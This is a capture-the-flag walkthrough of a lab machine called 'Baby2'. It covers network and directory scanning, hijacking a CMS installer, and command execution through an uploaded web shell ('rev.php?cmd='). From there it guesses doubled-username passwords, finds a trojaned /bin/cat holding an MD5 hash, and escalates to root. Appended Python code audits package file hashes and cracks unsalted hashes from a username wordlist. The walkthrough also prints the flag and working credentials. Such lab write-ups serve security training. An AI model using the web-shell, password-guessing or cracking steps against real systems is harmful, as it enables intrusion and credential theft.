
Group-shared target machine: Baby2

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:79:15:6b (Unknown)
192.168.56.108 08:00:27:9a:b0:ac (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.889 seconds (135.52 hosts/sec). 3 responded

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-22 13:55 +08
Nmap scan report for 192.168.56.108
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:9A:B0:AC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.113
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)^Z
zsh: suspended gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/

┌──(root㉿kali)-[/home/kali]
└─# ls /usr/share/wordlists/dirbuster/
apache-user-enum-1.0.txt directories.jbrofuzz directory-list-2.3-medium.txt directory-list-lowercase-2.3-medium.txt
apache-user-enum-2.0.txt directory-list-1.0.txt directory-list-2.3-small.txt directory-list-lowercase-2.3-small.txt

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.113
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)
2025/10/22 13:59:02 error on running gobuster on http://192.168.56.113/: unable to connect to http://192.168.56.113/: Get "http://192.168.56.113/": dial tcp 192.168.56.113:80: connect: no route to host

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.108/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108/wordpress
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 326] [--> http://192.168.56.108/wordpress/admin/]
/plugins (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/plugins/]
/cms (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/cms/]
/tmp (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/tmp/]
/layouts (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/layouts/]
/docu (Status: 301) [Size: 325] [--> http://192.168.56.108/wordpress/docu/]
/kategorien (Status: 301) [Size: 331] [--> http://192.168.56.108/wordpress/kategorien/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108/wordpress
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,php3,txt,html,zip,tar,bk,bak,gz,shtml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 7197]
/admin (Status: 301) [Size: 326] [--> http://192.168.56.108/wordpress/admin/]
/plugins (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/plugins/]
/update.php (Status: 200) [Size: 0]
/install.php (Status: 200) [Size: 6943]
/cms (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/cms/]
/readme.txt (Status: 200) [Size: 594]
/tmp (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/tmp/]
/layouts (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/layouts/]
/gpl.txt (Status: 200) [Size: 17996]
/docu (Status: 301) [Size: 325] [--> http://192.168.56.108/wordpress/docu/]

Information gathering

Browsing into /wordpress reveals an application; a thorough CVE search for it turns up an n-day.
Reference

A deeper scan (with file extensions) finds install.php. We run the installer first; the password can be set during installation, so I simply changed it there and could then log in to the admin backend.

Once in the backend, reproduce the CVE.

At first I could not rename the file; I handed it to DS for analysis and learned that double-clicking the file name lets you rename it.

Then visit:

http://192.168.56.108/wordpress/kategorien/Willkommen/dateien/rev.php?cmd=ls

The output is echoed back, so arbitrary commands can now be executed.

The user flag is in /home/aristore; read it straight through the RCE.

flag{user-b6cc0757c4a3108795d0803f9e82b9d3}
aristore:aristorearistore

There are also login credentials there; connect over SSH.

┌──(root㉿kali)-[/home/kali]
└─# ssh aristore@192.168.56.108
aristore@192.168.56.108's password:
Linux Baby2 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
aristore@Baby2:~$ id
uid=1000(aristore) gid=1000(aristore) groups=1000(aristore)

Then we notice that /home also has a user tuf, so we try switching to tuf. Since aristore's password was the username repeated twice, we try the same doubling for tuf's password, and the login succeeds.

tuf@Baby2:/home/aristore$ id
uid=1001(tuf) gid=1001(tuf) groups=1001(tuf)

Here I also learned to use dpkg -V to check for modified package files.

tuf@Baby2:/home/aristore$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5?????? /bin/cat
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue

Handed it to teacher DS for analysis and got the conclusion:
/bin/cat: a core system tool has been modified (highly suspicious)

So let's go and take a closer look.

tuf@Baby2:/home/aristore$  strings /bin/cat
#!/bin/bash
[[ "$1" == user.txt ]] && echo "flag{fake-flag}" && exit 1
/usr/bin/cat2 "$@"
# b4b8daf4b8ea9d39568719e1e320076f
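The dpkg -V output above uses rpm-style verification flags: nine positions per line, and a 5 in the third position means the MD5 of the installed file no longer matches the hash recorded in /var/lib/dpkg/info/<package>.md5sums. A leading c marks a conffile, which administrators legitimately edit, so among the entries that tuf could read, /bin/cat (no c) is the one that should never change, and strings shows why: it is now a bash wrapper, not an ELF binary. Below is an added Python example, not from the original writeup, that reproduces that check against a dpkg-style md5sums file and additionally reports whether a mismatched file is still an ELF executable or has been swapped for a script. The demo builds a throwaway directory tree with a constructed md5sums file and a wrapper modelled on the one above; the directory, the fake ELF bytes and the hashes are constructed, not the box's.

```python
"""Added example: verify package-owned files against a dpkg-style md5sums
list and flag binaries that have been replaced by scripts."""
import hashlib
import os
import tempfile

ELF_MAGIC = b"\x7fELF"


def parse_md5sums(path):
    """Parse the '<md5>  <path relative to />' lines used by
    /var/lib/dpkg/info/<pkg>.md5sums."""
    expected = {}
    with open(path, "r", encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line:
                continue
            digest, rel = line.split(None, 1)
            expected[rel] = digest.lower()
    return expected


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def file_kind(path):
    """Classify by magic bytes: a package binary should be 'elf'."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head.startswith(ELF_MAGIC):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"


def audit(root, md5sums_path):
    """Return findings for every file in md5sums_path, resolved under root
    (root='/' on a live system). Mirrors the '5' column of dpkg -V and adds
    a file-type check so a script masquerading as a binary stands out."""
    findings = []
    for rel, digest in sorted(parse_md5sums(md5sums_path).items()):
        full = os.path.join(root, rel)
        if not os.path.exists(full):
            findings.append({"path": rel, "issue": "missing"})
            continue
        try:
            actual = md5_of(full)
        except PermissionError:  # dpkg -V prints a warning here as an unprivileged user
            findings.append({"path": rel, "issue": "unreadable"})
            continue
        if actual != digest:
            findings.append({"path": rel, "issue": "modified", "kind": file_kind(full)})
    return findings


# Constructed demo tree (not the real box): a fake coreutils.md5sums covering
# bin/cat and bin/true, then bin/cat swapped for a wrapper like the page's.
FAKE_ELF = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 13 + b"fake original cat"
WRAPPER = (b"#!/bin/bash\n"
           b'[[ "$1" == user.txt ]] && echo "flag{fake-flag}" && exit 1\n'
           b'/usr/bin/cat2 "$@"\n')


def build_demo():
    """Create the temp tree and return (root, md5sums_path)."""
    root = tempfile.mkdtemp(prefix="dpkgv-")
    os.makedirs(os.path.join(root, "bin"))
    cat = os.path.join(root, "bin", "cat")
    true_ = os.path.join(root, "bin", "true")
    with open(cat, "wb") as fh:
        fh.write(FAKE_ELF)
    with open(true_, "wb") as fh:
        fh.write(FAKE_ELF + b"true")
    md5sums = os.path.join(root, "coreutils.md5sums")
    with open(md5sums, "w", encoding="utf-8") as fh:
        fh.write("%s  bin/cat\n%s  bin/true\n" % (md5_of(cat), md5_of(true_)))
    with open(cat, "wb") as fh:  # the "trojan": replace cat with the script
        fh.write(WRAPPER)
    return root, md5sums


if __name__ == "__main__":
    for finding in audit(*build_demo()):
        print(finding)
```

On a real Debian host the equivalent is audit("/", "/var/lib/dpkg/info/coreutils.md5sums"); files the current user cannot read come back as unreadable rather than silently passing, which is the same caveat the dpkg warnings above express. The file-type check is what dpkg -V does not do: a matching-length ELF patched in place would only show as modified, but a shell wrapper stands out immediately, and `file /bin/cat` gives the same answer interactively.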

A suspicious MD5. I ran it against a hash lookup and rootroot came out, which gives root's password; just switch to root.
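The password pattern on this box (aristore's password is the username twice, and tuf's follows suit) and the hash left in the wrapper are the kind of thing a small targeted wordlist cracks faster than a generic dictionary. Below is an added Python example, not from the original writeup, that builds candidates from the box's usernames with a few cheap mutations (including the doubled-username pattern), picks the hash algorithm from the digest length, and tests each candidate. The usernames and mutation list are assumptions; the SHA-1/SHA-256 handling goes beyond the page, which only involves MD5. The target in the demo is the hash from the /bin/cat comment above, which the writeup reports resolves to rootroot.

```python
"""Added example: crack an unsalted hash with a username-derived wordlist."""
import hashlib

# Hex digest length -> hashlib algorithm; 32 hex chars (the page's hash) is MD5.
HASH_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}

# Assumed inputs: the usernames seen on the box and the hash from the wrapper.
BOX_USERS = ["root", "tuf", "aristore"]
PAGE_HASH = "b4b8daf4b8ea9d39568719e1e320076f"


def mutate(word):
    """Yield cheap mutations of a base word. The doubling rule is the one that
    produced aristorearistore on this box; the rest are common habits."""
    yield word
    yield word * 2
    yield word.capitalize()
    yield word + "123"
    yield word[::-1]


def candidate_passwords(usernames, extra_words=()):
    """Generate unique candidates, usernames first, then any extra words."""
    seen = set()
    for base in list(usernames) + list(extra_words):
        for cand in mutate(base):
            if cand not in seen:
                seen.add(cand)
                yield cand


def hexdigest(algo, word):
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def crack_hash(target_hex, candidates):
    """Return the first candidate whose digest equals target_hex, else None.
    Raises ValueError if the digest length matches no known algorithm."""
    target_hex = target_hex.strip().lower()
    algo = HASH_BY_LENGTH.get(len(target_hex))
    if algo is None:
        raise ValueError("unrecognised digest length: %d" % len(target_hex))
    for pw in candidates:
        if hexdigest(algo, pw) == target_hex:
            return pw
    return None


if __name__ == "__main__":
    print(crack_hash(PAGE_HASH, candidate_passwords(BOX_USERS)))
```

The generator is lazy, so extending it with a real wordlist is one extra argument (for example the lines of rockyou.txt passed as extra_words) without changing the cracking loop; unsalted MD5 of a short, predictable string falls in microseconds either way, which is the lesson of the wrapper's comment.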

tuf@Baby2:/home/aristore$ su root
Password:
root@Baby2:/home/aristore# id
uid=0(root) gid=0(root) groups=0(root)